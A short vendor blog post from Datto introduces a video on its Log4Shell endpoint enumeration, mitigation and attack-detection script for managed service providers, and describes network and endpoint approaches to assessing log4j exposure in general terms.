December 17, 2021

Log4Shell RMM Community Script Explained (Video)

By Ryan Weeks
Threat Analysis

In response to the critical vulnerability referred to as Log4j, Datto released a Community Script for all MSPs earlier this week on Github as detailed in this blog: Log4Shell Enumeration, Mitigation and Attack Detection Tool. I’m encouraged to report that almost half of Datto RMM partners have taken action to execute this tool. Let’s keep this momentum going throughout the MSP community.

As an MSP, you have a large number of systems you protect and are helping your customers map which systems and applications may be vulnerable to the log4j RCE active exploits, referred to as Log4Shell. You’re trying to figure out how to quickly and confidently assess this exposure at scale.

The two main methods that have emerged to enumerate potentially vulnerable systems are:

  • Network Assessment – tools that attempt benign exploitation in order to enumerate vulnerability.
  • Endpoint Assessment – using your inventory of protected systems, you can run system-based checks for software running that is leveraging log4j, or has signs of attack attempts.

Datto noticed an abundance of tools released for Network Assessment in the first 24 hours, but limited tools that were easily accessible for MSPs and SMBs in the Endpoint Assessment space. To address this, the Datto RMM team packaged up some of the great work done by the security community into an easy to execute tool to augment Network Assessment capability with Endpoint Assessment.

Watch this in-depth explainer video on how to access, apply, run, and interpret the results of the Community Script:

 

For our Datto RMM partners, we’ve created a similar video for the Log4Shell Enumeration, Mitigation and Attack Detection Tool that can be found on Datto Community.

Suggested Next Reads